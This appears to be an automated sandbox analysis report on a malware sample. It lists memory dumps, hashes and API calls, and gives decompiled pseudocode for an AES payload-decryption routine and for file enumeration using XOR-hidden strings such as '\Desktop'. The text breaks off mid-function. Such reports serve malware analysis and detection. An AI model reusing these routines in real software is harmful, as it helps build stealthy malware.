M, xrefs: 008270ED
l, xrefs: 00826FC3
., xrefs: 0082691F
RQme, xrefs: 008272E2
Pk, xrefs: 00826E00
pj, xrefs: 00826EE0
RQHc, xrefs: 00827507
D{C, xrefs: 00826D2E
h<{C, xrefs: 00826CED
DP, xrefs: 0082706E
]Z\K, xrefs: 00826DA1

Memory Dump Source

Source File: 00000000.00000002.323501836.0000000000820000.00000040.00001000.00020000.00000000.sdmp, Offset: 00820000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_820000_qjrOWCCE58.jbxd

Yara matches

Similarity

API ID: CriticalSection$Init_thread_footer$EnterLeave
String ID: .$D{C$K[$RQHc$RQme$RQxf$]Z\K$h<{C$h@{C$%C$DP$Pk$pj$B$M$l
API String ID: 2198864263-3175192611
Opcode ID: 2b2c338b7d30dc3f93132291dff78abef820821cb4fcdb329b05d7df09f30ecf
Instruction ID: d5137bd453ccef1e613627675f92549fa35c407d9242388f115daba894bc21c8
Opcode Fuzzy Hash: 2b2c338b7d30dc3f93132291dff78abef820821cb4fcdb329b05d7df09f30ecf
Instruction Fuzzy Hash: CD521571A003A88AEB24CB28EC8979DBB71FF56304F1451E8E448A7692E7755FC4CF16

Uniqueness

Uniqueness Score: -1.00%

Function 00403050 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 232
encryptionCOMMON

Download Yara Rule

C-Code - Quality: 53%

			E00403050(void* __ebx, int __ecx, int __edx, void* __edi, intOrPtr* _a4, void* _a8, intOrPtr _a24, intOrPtr _a28) {
				long* _v8;
				char _v16;
				signed int _v24;
				void _v136;
				long* _v140;
				int _v144;
				char _v148;
				long* _v152;
				int _v156;
				signed int _v160;
				int _v164;
				BYTE* _v168;
				int _v172;
				intOrPtr* _v176;
				int _v180;
				intOrPtr _v220;
				void* __esi;
				void* __ebp;
				signed int _t69;
				signed int _t70;
				void* _t77;
				intOrPtr* _t82;
				char* _t92;
				void* _t94;
				intOrPtr _t95;
				void* _t99;
				int _t100;
				BYTE* _t103;
				intOrPtr _t106;
				int _t117;
				void* _t118;
				intOrPtr* _t126;
				void* _t127;
				int _t132;
				intOrPtr _t135;
				int _t138;
				intOrPtr _t140;
				signed int _t145;
				void* _t146;
				intOrPtr* _t147;
				signed int _t149;
				void* _t150;
				void* _t151;
				void* _t152;
				intOrPtr* _t153;
				signed int _t155;
				void* _t157;
				void* _t159;

				_t69 =  *0x43b054; // 0x41d6575c
				_t70 = _t69 ^ _t155;
				_v24 = _t70;
				 *[fs:0x0] =  &_v16;
				_t117 = __edx;
				_v172 = __edx;
				_v156 = __ecx;
				_v176 = _a4;
				_v8 = 0;
				_t151 = L"Microsoft Enhanced RSA and AES Cryptographic Provider";
				_v160 = _a24 + _a24;
				_t77 = memcpy( &_v136, _t151, 0x1b << 2);
				_t159 = _t157 - 0xa8 + 0xc;
				__imp__CryptAcquireContextW(_t77, 0,  &_v136, 0x18, 0xf0000000, _t70, __edi, _t150, __ebx,  *[fs:0x0], 0x42ab1d, 0xffffffff);
				if(_t77 == 0) {
					L7:
					_t145 = GetLastError();
					CryptReleaseContext(_v140, 0);
				} else {
					_t92 =  &_v148;
					__imp__CryptCreateHash(_v140, 0x800c, 0, 0, _t92);
					if(_t92 == 0) {
						goto L7;
					} else {
						_t94 =  >=  ? _a8 :  &_a8;
						_t147 = _t94;
						_v164 = _t94;
						_t127 = _t147 + 1;
						do {
							_t95 =  *_t147;
							_t147 = _t147 + 1;
							_t168 = _t95;
						} while (_t95 != 0);
						_t149 = _t147 - _t127 + 1;
						_t151 = E0040D5FD(_t149, _t151, _t168,  ~(0 | _t168 > 0x00000000) | _t149 * 0x00000002);
						_t99 = E00414D4C(_t151, _v164, _t149);
						_t159 = _t159 + 0x10;
						__imp__CryptHashData(_v148, _t151, _v160, 0);
						if(_t99 != 0) {
							_t100 =  &_v152;
							__imp__CryptDeriveKey(_v140, 0x660e, _v148, 0, _t100);
							__eflags = _t100;
							if(__eflags != 0) {
								_push(_t117);
								_t151 = E00414ABE();
								E0040ECB0(_t151, _v156, _t117);
								_t103 = E0040D5FD(_t149, _t151, __eflags, 0xa0);
								_t138 = _v172;
								_t145 = 0;
								_t159 = _t159 + 0x14;
								_v168 = _t103;
								_v144 = 0;
								_v156 = 0;
								_v160 = 0;
								__eflags = _t138;
								if(__eflags != 0) {
									_t132 = _t138;
									_t106 = 0xa0 - _t151;
									__eflags = 0xa0;
									_v164 = _t132;
									_v180 = 0xa0;
									while(1) {
										_t117 = 0xa0;
										__eflags = _t106 + _t151 - _t138;
										if(_t106 + _t151 >= _t138) {
											_t117 = _t132;
											_v156 = 1;
										}
										_v144 = _t117;
										E0040ECB0(_v168, _t151, _t117);
										_t159 = _t159 + 0xc;
										__eflags = CryptDecrypt(_v152, 0, _v156, 0, _v168,  &_v144);
										if(__eflags == 0) {
											goto L15;
										}
										E0040ECB0( *_v176 + _t145, _v168, _v144);
										_t145 = _t145 + _v144;
										_t159 = _t159 + 0xc;
										__eflags = _t117 - 0xa0;
										if(__eflags == 0) {
											_t151 = _t151 + _t117;
											_t140 = _v160 + 1;
											_t106 = _v180;
											_t132 = _v164 - _t117;
											__eflags = _t140 - _v172;
											_v160 = _t140;
											_t138 = _v172;
											_v164 = _t132;
											if(__eflags < 0) {
												continue;
											}
										}
										goto L15;
									}
								}
								L15:
								CryptDestroyKey(_v152);
							} else {
								goto L7;
							}
						} else {
							GetLastError();
							_t145 = _t149 | 0xffffffff;
						}
					}
				}
				_t135 = _a28;
				if(_t135 < 0x10) {
					L20:
					 *[fs:0x0] = _v16;
					_pop(_t146);
					_pop(_t152);
					_pop(_t118);
					return E0040D3AF(_t145, _t118, _v24 ^ _t155, _t135, _t146, _t152);
				} else {
					_t126 = _a8;
					_t135 = _t135 + 1;
					_t82 = _t126;
					if(_t135 < 0x1000) {
						L19:
						_push(_t135);
						E0040D5EF(_t126);
						goto L20;
					} else {
						_t126 =  *((intOrPtr*)(_t126 - 4));
						_t135 = _t135 + 0x23;
						if(_t82 - _t126 + 0xfffffffc > 0x1f) {
							E00411D17(_t117, _t126, _t135, __eflags);
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							_push(_t155);
							_push(_t151);
							_t153 = _t126;
							asm("xorps xmm0, xmm0");
							 *_t153 = 0x42c2d4;
							asm("movq [eax], xmm0");
							__eflags = _v220 + 4;
							E0040E761(_v220 + 4, _t153 + 4);
							 *_t153 = 0x42c320;
							return _t153;
						} else {
							goto L19;
						}
					}
				}
			}

0x00403067
0x0040306c
0x0040306e
0x00403078
0x0040307e
0x00403080
0x00403086
0x0040308f
0x00403095
0x004030ac
0x004030b6
0x004030cd
0x004030cd
0x004030d0
0x004030d8
0x0040319a
0x004031a8
0x004031aa
0x004030de
0x004030de
0x004030f4
0x004030fc
0x00000000
0x00403102
0x00403109
0x0040310d
0x0040310f
0x00403115
0x00403118
0x00403118
0x0040311a
0x0040311b
0x0040311b
0x00403126
0x0040313d
0x00403147
0x0040314c
0x0040315e
0x00403166
0x00403176
0x00403190
0x00403196
0x00403198
0x004031b5
0x004031be
0x004031c8
0x004031d5
0x004031da
0x004031e0
0x004031e2
0x004031e5
0x004031eb
0x004031f5
0x004031ff
0x00403205
0x00403207
0x00403212
0x00403214
0x00403214
0x00403216
0x0040321c
0x00403222
0x00403224
0x00403229
0x0040322b
0x0040322d
0x0040322f
0x0040322f
0x00403241
0x00403247
0x0040324c
0x00403272
0x00403274
0x00000000
0x00000000
0x0040328d
0x00403292
0x00403298
0x0040329b
0x004032a1
0x004032a9
0x004032b1
0x004032b2
0x004032b8
0x004032ba
0x004032c0
0x004032c6
0x004032cc
0x004032d2
0x00000000
0x00000000
0x004032d2
0x00000000
0x004032a1
0x00403222
0x004032d8
0x004032de
0x00000000
0x00000000
0x00000000
0x00403168
0x00403168
0x0040316e
0x0040316e
0x00403166
0x004030fc
0x004032e4
0x004032ea
0x00403314
0x00403319
0x00403321
0x00403322
0x00403323
0x00403331
0x004032ec
0x004032ec
0x004032ef
0x004032f0
0x004032f8
0x0040330a
0x0040330a
0x0040330c
0x00000000
0x004032fa
0x004032fa
0x004032fd
0x00403308
0x00403332
0x00403337
0x00403338
0x00403339
0x0040333a
0x0040333b
0x0040333c
0x0040333d
0x0040333e
0x0040333f
0x00403340
0x00403343
0x00403344
0x00403346
0x0040334d
0x00403353
0x0040335a
0x0040335e
0x00403366
0x00403370
0x00000000
0x00000000
0x00000000
0x00403308
0x004032f8

APIs

CryptAcquireContextW.ADVAPI32(?,00000000,?,00000018,F0000000,41D6575C), ref: 004030D0
CryptCreateHash.ADVAPI32(?,0000800C,00000000,00000000,?), ref: 004030F4
_mbstowcs.LIBCMT ref: 00403147
CryptHashData.ADVAPI32(?,00000000,?,00000000), ref: 0040315E
GetLastError.KERNEL32 ref: 00403168
CryptDeriveKey.ADVAPI32(?,0000660E,?,00000000,?), ref: 00403190
GetLastError.KERNEL32 ref: 0040319A
CryptReleaseContext.ADVAPI32(?,00000000), ref: 004031AA
CryptDecrypt.ADVAPI32(?,00000000,00000000,00000000,?,00000000), ref: 0040326C
CryptDestroyKey.ADVAPI32(?), ref: 004032DE
___std_exception_copy.LIBVCRUNTIME ref: 0040335E

Strings

Microsoft Enhanced RSA and AES Cryptographic Provider, xrefs: 004030AC, 00403343

Memory Dump Source

Source File: 00000000.00000002.323104838.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_qjrOWCCE58.jbxd

Yara matches

Similarity

API ID: Crypt$ContextErrorHashLast$AcquireCreateDataDecryptDeriveDestroyRelease___std_exception_copy_mbstowcs
String ID: Microsoft Enhanced RSA and AES Cryptographic Provider
API String ID: 4265767208-63410773
Opcode ID: 53aab1054b1d70bee5897cc2b998a8de1d2fa3f6a3bf43f5e22de2b6868b5d9d
Instruction ID: 1a0f091e7855fb23958bf18084b0098b12681cbb51f01ea64fb7f261bc436661
Opcode Fuzzy Hash: 53aab1054b1d70bee5897cc2b998a8de1d2fa3f6a3bf43f5e22de2b6868b5d9d
Instruction Fuzzy Hash: C781B371A00218AFDF208F65CC41B9EBBB9EF45304F4081AAE54CE7281DB359E848F55

Uniqueness

Uniqueness Score: -1.00%

Function 008232B7 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 232encryptionCOMMON

Download Yara Rule

APIs

CryptAcquireContextW.ADVAPI32(?,00000000,?,00000018,F0000000,0043B054), ref: 00823337
CryptCreateHash.ADVAPI32(?,0000800C,00000000,00000000,?), ref: 0082335B
_mbstowcs.LIBCMT ref: 008233AE
CryptHashData.ADVAPI32(?,00000000,?,00000000), ref: 008233C5
GetLastError.KERNEL32 ref: 008233CF
CryptDeriveKey.ADVAPI32(?,0000660E,?,00000000,?), ref: 008233F7
GetLastError.KERNEL32 ref: 00823401
CryptReleaseContext.ADVAPI32(?,00000000), ref: 00823411
CryptDecrypt.ADVAPI32(?,00000000,00000000,00000000,?,00000000), ref: 008234D3
CryptDestroyKey.ADVAPI32(?), ref: 00823545
___std_exception_copy.LIBVCRUNTIME ref: 008235C5

Strings

Microsoft Enhanced RSA and AES Cryptographic Provider, xrefs: 00823313, 008235AA

Memory Dump Source

Source File: 00000000.00000002.323501836.0000000000820000.00000040.00001000.00020000.00000000.sdmp, Offset: 00820000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_820000_qjrOWCCE58.jbxd

Yara matches

Similarity

API ID: Crypt$ContextErrorHashLast$AcquireCreateDataDecryptDeriveDestroyRelease___std_exception_copy_mbstowcs
String ID: Microsoft Enhanced RSA and AES Cryptographic Provider
API String ID: 4265767208-63410773
Opcode ID: 57b16afbcd89ae8d013d1519caeef3f75f0ec51b6cdf973404ff3a320172e0e7
Instruction ID: 15324f03ebd8a93b4f108fb82d63d24e15bdb0fd95a031d8d9a6020ec6146dbb
Opcode Fuzzy Hash: 57b16afbcd89ae8d013d1519caeef3f75f0ec51b6cdf973404ff3a320172e0e7
Instruction Fuzzy Hash: CA819D71A00228AFEF209F68DC45B9EBBB5FF45300F5081A9E94DE7281DB359E848F55

Uniqueness

Uniqueness Score: -1.00%

Function 00403D70 Relevance: 19.9, APIs: 7, Strings: 4, Instructions: 644
fileCOMMONCrypto

Download Yara Rule

C-Code - Quality: 63%

			E00403D70(void* __ebx, void* __ecx) {
				intOrPtr _v8;
				int _v16;
				int _v24;
				int _v28;
				signed int _v32;
				int _v36;
				int _v40;
				signed int _v44;
				signed int _v48;
				int _v52;
				signed int _v56;
				char _v60;
				char _v64;
				long _v68;
				int _v72;
				signed int _v76;
				intOrPtr _v80;
				intOrPtr _v84;
				long _v88;
				char _v89;
				char _v90;
				char _v92;
				char _v96;
				long _v100;
				int _v104;
				char _v105;
				signed int _v112;
				intOrPtr _v116;
				int _v120;
				long _v124;
				int _v128;
				int _v144;
				char _v308;
				char _v312;
				char _v316;
				struct _WIN32_FIND_DATAA _v412;
				char _v416;
				intOrPtr _v440;
				char _v456;
				signed int _v464;
				intOrPtr _v472;
				intOrPtr _v476;
				intOrPtr _v480;
				char _v564;
				int _v580;
				int _v588;
				char _v596;
				signed int _v604;
				intOrPtr _v1592;
				int _v1600;
				int _v1604;
				long _v1608;
				int _v1612;
				int _v1628;
				struct HKL__* _v2136;
				signed int _v2140;
				int _v2144;
				int _v2180;
				intOrPtr _v2204;
				char _v2212;
				signed int _v2216;
				intOrPtr _v2228;
				intOrPtr _v2232;
				signed int _v2236;
				intOrPtr _v2272;
				intOrPtr _v2276;
				signed int _v2328;
				char _v2578;
				short _v2580;
				int* _v2596;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t300;
				signed int _t301;
				int _t310;
				intOrPtr _t313;
				signed int _t320;
				signed int _t321;
				intOrPtr _t324;
				signed int _t325;
				intOrPtr* _t329;
				signed int _t330;
				intOrPtr _t335;
				signed char _t336;
				signed int _t337;
				signed int _t339;
				intOrPtr _t340;
				signed char _t341;
				signed int _t342;
				signed int _t344;
				intOrPtr _t345;
				signed int _t346;
				signed int _t348;
				int _t351;
				signed int _t357;
				signed int _t358;
				signed int _t361;
				int _t364;
				intOrPtr* _t366;
				int _t370;
				int _t372;
				signed int _t378;
				signed int _t379;
				intOrPtr _t381;
				intOrPtr _t390;
				signed int _t396;
				short _t398;
				signed int _t403;
				signed int _t409;
				intOrPtr _t414;
				signed char _t415;
				signed char* _t416;
				void* _t421;
				long _t422;
				intOrPtr _t423;
				int _t424;
				intOrPtr _t428;
				intOrPtr _t429;
				int _t430;
				int _t434;
				void* _t438;
				signed int _t439;
				void* _t445;
				signed int _t455;
				int _t462;
				signed int _t467;
				void* _t478;
				intOrPtr _t482;
				void* _t489;
				signed int _t490;
				void* _t491;
				void* _t495;
				char* _t499;
				int* _t503;
				long _t508;
				void* _t514;
				void* _t516;
				void* _t518;
				int* _t520;
				signed int _t522;
				int _t523;
				void* _t524;
				signed int _t528;
				signed int _t531;
				intOrPtr* _t537;
				intOrPtr* _t540;
				signed char* _t544;
				intOrPtr* _t548;
				intOrPtr* _t552;
				int _t560;
				signed int _t566;
				int _t568;
				int _t571;
				signed int* _t572;
				signed int _t582;
				intOrPtr* _t583;
				signed int _t589;
				int _t593;
				signed int _t597;
				intOrPtr _t598;
				void* _t602;
				void* _t603;
				char _t604;
				long _t608;
				void* _t609;
				int _t611;
				void* _t613;
				long _t615;
				long _t616;
				int* _t617;
				int* _t618;
				int* _t619;
				long _t620;
				void* _t621;
				void* _t625;
				signed char* _t626;
				void* _t627;
				void* _t630;
				void* _t631;
				void* _t632;
				int _t633;
				void* _t634;
				int _t635;
				void* _t636;
				signed int _t637;
				void* _t638;
				signed int _t639;
				void* _t640;
				int* _t641;
				void* _t642;
				void* _t643;
				void* _t644;
				void* _t645;
				int _t646;
				signed char* _t647;
				void* _t648;
				void* _t649;
				void* _t650;
				int _t651;
				void* _t652;
				void* _t653;
				signed int _t654;
				void* _t656;
				void* _t657;
				int _t658;
				void* _t661;
				signed int _t664;
				signed int _t667;
				signed int _t670;
				signed int _t672;
				signed int _t674;
				void* _t676;
				signed int _t679;
				void* _t680;
				signed int _t686;
				void* _t687;
				int* _t688;
				int* _t689;
				int* _t690;
				int* _t691;
				int* _t692;
				int* _t693;
				signed int _t699;
				signed int _t700;
				void* _t703;
				signed int _t705;

				_push(__ebx);
				_t516 = _t676;
				_t679 = (_t676 - 0x00000008 & 0xfffffff8) + 4;
				_v8 =  *((intOrPtr*)(_t516 + 4));
				_t664 = _t679;
				_push(0xffffffff);
				_push(0x42ac98);
				_push( *[fs:0x0]);
				_push(_t516);
				_t680 = _t679 - 0x188;
				_t300 =  *0x43b054; // 0x41d6575c
				_t301 = _t300 ^ _t664;
				_v32 = _t301;
				_push(_t643);
				_push(_t632);
				_push(_t301);
				 *[fs:0x0] =  &_v24;
				_v16 = 0;
				asm("xorps xmm0, xmm0");
				asm("movq [ebp-0x20], xmm0");
				_v36 = 0;
				_v44 = 0;
				_v40 = 0;
				_v36 = 0;
				_v16 = 1;
				E0040A490(_t516,  &_v92, _t609, _t632, __ecx);
				_v16 = 2;
				_t610 = _v72;
				_t528 = _v76;
				if(_v72 - _t528 < 2) {
					_v416 = 0;
					E00402270(_t516,  &_v92, _t632, _t643, 2, _v416, "\\*", 2);
				} else {
					_v76 = _t528 + 2;
					_t610 = 0x2a5c;
					_t514 =  >=  ? _v92 :  &_v92;
					 *((short*)(_t514 + _t528)) = 0x2a5c;
					 *((char*)(_t514 + _t528 + 2)) = 0;
				}
				_t308 =  >=  ? _v92 :  &_v92;
				_t644 = FindFirstFileA( >=  ? _v92 :  &_v92,  &_v412);
				if(_t644 == 0xffffffff) {
					L16:
					_t310 = _v40;
					_t633 = _v44;
					_v416 = _t310;
					if(_t633 == _t310) {
						L24:
						_t633 = 0;
						goto L25;
					} else {
						while(1) {
							E0040A490(_t516,  &_v68, _t610, _t633, _t633);
							_t488 =  >=  ?  *((void*)(_t516 + 8)) : _t516 + 8;
							_t644 = _v68;
							_t612 = _v52;
							_t601 =  >=  ? _t644 :  &_v68;
							_t489 = E00402180( >=  ? _t644 :  &_v68, _v52,  >=  ? _t644 :  &_v68,  >=  ?  *((void*)(_t516 + 8)) : _t516 + 8,  *((intOrPtr*)(_t516 + 0x18)));
							_t680 = _t680 + 0xc;
							_t490 = _v48;
							if(_t489 != 0xffffffff) {
								break;
							}
							if(_t490 < 0x10) {
								L23:
								_t633 = _t633 + 0x18;
								if(_t633 != _v416) {
									continue;
								} else {
									goto L24;
								}
							} else {
								_t63 = _t490 + 1; // 0x11
								_t603 = _t63;
								_t495 = _t644;
								if(_t603 < 0x1000) {
									L22:
									_push(_t603);
									E0040D5EF(_t644);
									_t680 = _t680 + 8;
									goto L23;
								} else {
									_t644 =  *(_t644 - 4);
									_t536 = _t603 + 0x23;
									if(_t495 - _t644 + 0xfffffffc > 0x1f) {
										goto L45;
									} else {
										goto L22;
									}
								}
							}
							goto L158;
						}
						__eflags = _t490 - 0x10;
						if(__eflags < 0) {
							L41:
							_t633 = 1;
							L25:
							_t611 = _v72;
							if(_t611 < 0x10) {
								L29:
								_t531 = _v44;
								_v76 = 0;
								_v72 = 0xf;
								_v92 = 0;
								if(_t531 == 0) {
									L33:
									_t612 =  *(_t516 + 0x1c);
									if(_t612 < 0x10) {
										L43:
										 *[fs:0x0] = _v24;
										_pop(_t634);
										_pop(_t645);
										return E0040D3AF(_t633, _t516, _v32 ^ _t664, _t612, _t634, _t645);
									} else {
										_t536 =  *((intOrPtr*)(_t516 + 8));
										_t612 = _t612 + 1;
										_t313 = _t536;
										if(_t612 < 0x1000) {
											L42:
											_push(_t612);
											E0040D5EF(_t536);
											goto L43;
										} else {
											_t536 =  *((intOrPtr*)(_t536 - 4));
											_t612 = _t612 + 0x23;
											if(_t313 - _t536 + 0xfffffffc > 0x1f) {
												goto L44;
											} else {
												goto L42;
											}
										}
									}
								} else {
									_push(_t531);
									E0040BBE0(_t516, _t531, _v40, _t633, _t644);
									_t644 = _v44;
									_t680 = _t680 + 4;
									_t612 = 0x2aaaaaab * (_v36 - _t644) >> 0x20 >> 2;
									_t478 = _t644;
									_t597 = (0x2aaaaaab * (_v36 - _t644) >> 0x20 >> 2 >> 0x1f) + (0x2aaaaaab * (_v36 - _t644) >> 0x20 >> 2) + ((0x2aaaaaab * (_v36 - _t644) >> 0x20 >> 2 >> 0x1f) + (0x2aaaaaab * (_v36 - _t644) >> 0x20 >> 2)) * 2 << 3;
									if(_t597 < 0x1000) {
										L32:
										_push(_t597);
										E0040D5EF(_t644);
										_t680 = _t680 + 8;
										_v44 = 0;
										_v40 = 0;
										_v36 = 0;
										goto L33;
									} else {
										_t644 =  *(_t644 - 4);
										_t536 = _t597 + 0x23;
										if(_t478 - _t644 + 0xfffffffc > 0x1f) {
											goto L44;
										} else {
											goto L32;
										}
									}
								}
							} else {
								_t598 = _v92;
								_t630 = _t611 + 1;
								_t482 = _t598;
								if(_t630 < 0x1000) {
									L28:
									_push(_t630);
									E0040D5EF(_t598);
									_t680 = _t680 + 8;
									goto L29;
								} else {
									_t536 =  *((intOrPtr*)(_t598 - 4));
									_t612 = _t630 + 0x23;
									if(_t482 -  *((intOrPtr*)(_t598 - 4)) + 0xfffffffc > 0x1f) {
										goto L44;
									} else {
										goto L28;
									}
								}
							}
						} else {
							_t89 = _t490 + 1; // 0x11
							_t602 = _t89;
							_t491 = _t644;
							__eflags = _t602 - 0x1000;
							if(__eflags < 0) {
								L40:
								_push(_t602);
								E0040D5EF(_t644);
								_t680 = _t680 + 8;
								goto L41;
							} else {
								_t644 =  *(_t644 - 4);
								_t536 = _t602 + 0x23;
								__eflags = _t491 - _t644 + 0xfffffffc - 0x1f;
								if(__eflags > 0) {
									goto L45;
								} else {
									goto L40;
								}
							}
						}
					}
				} else {
					_t633 = FindNextFileA;
					goto L5;
					do {
						L6:
						_t604 =  *_t499;
						_t499 = _t499 + 1;
					} while (_t604 != 0);
					_push(_t499 - _t631);
					E00402030( &_v68,  &(_v412.cFileName));
					_v16 = 3;
					_t503 = _v40;
					if(_t503 == _v36) {
						_push( &_v68);
						_push(_t503);
						E0040B640(_t516,  &_v44, _t633, _t644);
						_t610 = _v48;
					} else {
						asm("movups xmm0, [ebp-0x38]");
						 *_t503 = 0;
						_t610 = 0xf;
						_v68 = 0;
						asm("movups [eax], xmm0");
						asm("movq xmm0, [ebp-0x28]");
						asm("movq [eax+0x10], xmm0");
						_v40 = _v40 + 0x18;
					}
					_v16 = 2;
					if(_t610 < 0x10) {
						L14:
						if(FindNextFileA(_t644,  &_v412) != 0) {
							L5:
							_t499 =  &(_v412.cFileName);
							_v68 = 0;
							_v52 = 0;
							_t631 = _t499 + 1;
							_v48 = 0xf;
							_v68 = 0;
							goto L6;
						} else {
							FindClose(_t644);
							goto L16;
						}
					} else {
						_t608 = _v68;
						_t610 = _t610 + 1;
						_t508 = _t608;
						if(_t610 < 0x1000) {
							L13:
							_push(_t610);
							E0040D5EF(_t608);
							_t680 = _t680 + 8;
							goto L14;
						} else {
							_t536 =  *((intOrPtr*)(_t608 - 4));
							_t612 = _t610 + 0x23;
							if(_t508 -  *((intOrPtr*)(_t608 - 4)) + 0xfffffffc > 0x1f) {
								L44:
								E00411D17(_t516, _t536, _t612, __eflags);
								L45:
								E00411D17(_t516, _t536, _t612, __eflags);
								asm("int3");
								asm("int3");
								asm("int3");
								asm("int3");
								asm("int3");
								asm("int3");
								asm("int3");
								asm("int3");
								asm("int3");
								asm("int3");
								asm("int3");
								asm("int3");
								asm("int3");
								asm("int3");
								asm("int3");
								_push(_t516);
								_t518 = _t680;
								_t686 = (_t680 - 0x00000008 & 0xfffffff8) + 4;
								_push(_t664);
								_v440 =  *((intOrPtr*)(_t518 + 4));
								_t667 = _t686;
								_push(0xffffffff);
								_push(0x42ace5);
								_push( *[fs:0x0]);
								_push(_t518);
								_t687 = _t686 - 0x50;
								_t320 =  *0x43b054; // 0x41d6575c
								_t321 = _t320 ^ _t667;
								_v464 = _t321;
								_push(_t644);
								_push(_t633);
								_push(_t321);
								 *[fs:0x0] =  &_v456;
								_v480 = 0x7c6b7d7b;
								_v476 = 0x68617c7e;
								_v472 = 0x2e6b6267;
								_t635 =  *( *[fs:0x2c]);
								_t324 =  *0x43cf94; // 0x0
								__eflags = _t324 -  *((intOrPtr*)(_t635 + 4));
								if(_t324 >  *((intOrPtr*)(_t635 + 4))) {
									E0040D738(_t324, 0x43cf94);
									_t687 = _t687 + 4;
									__eflags =  *0x43cf94 - 0xffffffff;
									if(__eflags == 0) {
										asm("movq xmm0, [ebp-0x24]");
										asm("movq [0x43cd8c], xmm0");
										 *0x43cd94 = _v52;
										E0040DA4A(_t536, __eflags, 0x42b4f0);
										E0040D6EE(0x43cf94);
										_t687 = _t687 + 8;
									}
								}
								__eflags =  *0x43cd97;
								if( *0x43cd97 != 0) {
									_t467 = 0;
									__eflags = 0;
									do {
										 *(_t467 + 0x43cd8c) =  *(_t467 + 0x43cd8c) ^ 0x0000002e;
										_t467 = _t467 + 1;
										__eflags = _t467 - 0xc;
									} while (_t467 < 0xc);
								}
								_t537 = 0x43cd8c;
								_v120 = 0;
								_v104 = 0;
								_v100 = 0xf;
								_v120 = 0;
								_t108 = _t537 + 1; // 0x43cd8d
								_t613 = _t108;
								do {
									_t325 =  *_t537;
									_t537 = _t537 + 1;
									__eflags = _t325;
								} while (_t325 != 0);
								_push(_t537 - _t613);
								E00402030( &_v120, 0x43cd8c);
								_v28 = 0;
								__eflags = _v100 - 0x10;
								_t328 =  >=  ? _v120 :  &_v120;
								_t329 = E00417335(_t518, _t635, _t644, _v100 - 0x10,  >=  ? _v120 :  &_v120);
								_t614 = _t329;
								_v88 = 0;
								_t540 = _t329;
								_v72 = 0;
								_t688 = _t687 + 4;
								_v68 = 0xf;
								_v88 = 0;
								_t118 = _t540 + 1; // 0x1
								_t646 = _t118;
								do {
									_t330 =  *_t540;
									_t540 = _t540 + 1;
									__eflags = _t330;
								} while (_t330 != 0);
								_push(_t540 - _t646);
								E00402030( &_v88, _t614);
								_v28 = 2;
								_t615 = _v100;
								__eflags = _t615 - 0x10;
								if(_t615 < 0x10) {
									L60:
									_t616 = _v68;
									_t543 = _v72;
									_v104 = 0;
									_v100 = 0xf;
									_v120 = 0;
									_push(8);
									_push("\\Desktop");
									__eflags = _t616 - _t543 - 8;
									if(_t616 - _t543 < 8) {
										_v96 = 0;
										_t543 =  &_v88;
										_push(_v96);
										_push(8);
										E00402270(_t518,  &_v88, _t635, _t646);
									} else {
										__eflags = _t616 - 0x10;
										_t130 = _t543 + 8; // 0x8
										_t660 =  >=  ? _v88 :  &_v88;
										_t661 = ( >=  ? _v88 :  &_v88) + _t543;
										_v72 = _t130;
										_push(_t661);
										E0040ECB0();
										_t688 =  &(_t688[3]);
										 *((char*)(_t661 + 8)) = 0;
									}
									_t335 =  *0x43ced8; // 0x0
									_v56 = 0x4b426d6d;
									_v52 = 0x5c4b404f;
									_v89 = 0x2e;
									__eflags = _t335 -  *((intOrPtr*)(_t635 + 4));
									if(_t335 >  *((intOrPtr*)(_t635 + 4))) {
										E0040D738(_t335, 0x43ced8);
										_t688 =  &(_t688[1]);
										__eflags =  *0x43ced8 - 0xffffffff;
										if(__eflags == 0) {
											asm("movq xmm0, [ebp-0x20]");
											asm("movq [0x43cd14], xmm0");
											 *0x43cd1c = _v89;
											E0040DA4A(_t543, __eflags, 0x42b4d0);
											E0040D6EE(0x43ced8);
											_t688 =  &(_t688[2]);
										}
									}
									_t336 =  *0x43cd1c; // 0x0
									__eflags = _t336;
									if(_t336 != 0) {
										 *0x43cd14 =  *0x43cd14 ^ 0x0000002e;
										 *0x43cd15 =  *0x43cd15 ^ 0x0000002e;
										 *0x43cd16 =  *0x43cd16 ^ 0x0000002e;
										 *0x43cd17 =  *0x43cd17 ^ 0x0000002e;
										 *0x43cd18 =  *0x43cd18 ^ 0x0000002e;
										 *0x43cd19 =  *0x43cd19 ^ 0x0000002e;
										 *0x43cd1a =  *0x43cd1a ^ 0x0000002e;
										 *0x43cd1b =  *0x43cd1b ^ 0x0000002e;
										_t455 = _t336 ^ 0x0000002e;
										__eflags = _t455;
										 *0x43cd1c = _t455;
									}
									_t689 = _t688 - 0x18;
									_t544 = 0x43cd14;
									_t617 = _t689;
									_t142 =  &(_t544[1]); // 0x43cd15
									_t647 = _t142;
									 *_t617 = 0;
									_t617[4] = 0;
									_t617[5] = 0xf;
									do {
										_t337 =  *_t544;
										_t544 =  &(_t544[1]);
										__eflags = _t337;
									} while (_t337 != 0);
									_push(_t544 - _t647);
									E00402030(_t617, 0x43cd14);
									_t339 = E00403D70(_t518,  &_v88);
									_t690 =  &(_t689[6]);
									_v89 = 0x2e;
									__eflags = _t339;
									_t340 =  *0x43cd5c; // 0x0
									_v90 = _t339 != 0;
									__eflags = _t340 -  *((intOrPtr*)(_t635 + 4));
									if(_t340 >  *((intOrPtr*)(_t635 + 4))) {
										E0040D738(_t340, 0x43cd5c);
										_t690 =  &(_t690[1]);
										__eflags =  *0x43cd5c - 0xffffffff;
										if(__eflags == 0) {
											asm("movaps xmm0, [0x437da0]");
											asm("movups [0x43cdd8], xmm0");
											 *0x43cde8 = _v89;
											E0040DA4A( &_v88, __eflags, 0x42b4b0);
											E0040D6EE(0x43cd5c);
											_t690 =  &(_t690[2]);
										}
									}
									_t341 =  *0x43cde8; // 0x0
									__eflags = _t341;
									if(_t341 != 0) {
										asm("movups xmm0, [0x43cdd8]");
										asm("movaps xmm1, [0x437d50]");
										asm("pxor xmm1, xmm0");
